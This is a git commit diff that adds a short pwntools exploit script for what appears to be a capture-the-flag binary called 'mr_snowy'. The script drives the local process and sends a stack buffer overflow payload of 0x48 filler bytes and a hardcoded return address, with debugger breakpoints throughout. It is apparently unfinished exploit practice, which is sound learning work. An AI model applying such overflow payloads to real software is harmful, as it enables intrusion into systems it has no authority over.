add exploit script

2021-12-08 01:13:35 +01:00
parent ec623b0aaa
commit 3365ce2c4e
10 changed files with 67 additions and 24 deletions
--- a/pwn/mrsnowy/mrsnowy.bak/pwn.py
+++ b/pwn/mrsnowy/mrsnowy.bak/pwn.py
@@ -0,0 +1,28 @@
+import ipdb
+from pwnlib.context import *
+from pwnlib.elf import *
+from pwnlib.tubes.process import *
+from pwnlib.gdb import *
+from pwnlib.util.packing import *
+from pwnlib.rop.rop import *
+
+context(arch='x86_64', os='linux')
+context.terminal = ['/usr/bin/alacritty', '-e']
+e = ELF("mr_snowy")
+r = ROP(e)
+ipdb.set_trace()
+p = process(e.path)
+
+def do_read():
+  while True:
+     ll = p.read()
+     print(ll)
+     if b'>' in ll:
+       break
+
+do_read()
+p.sendline('1')
+do_read()
+p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))
+
+ipdb.set_trace()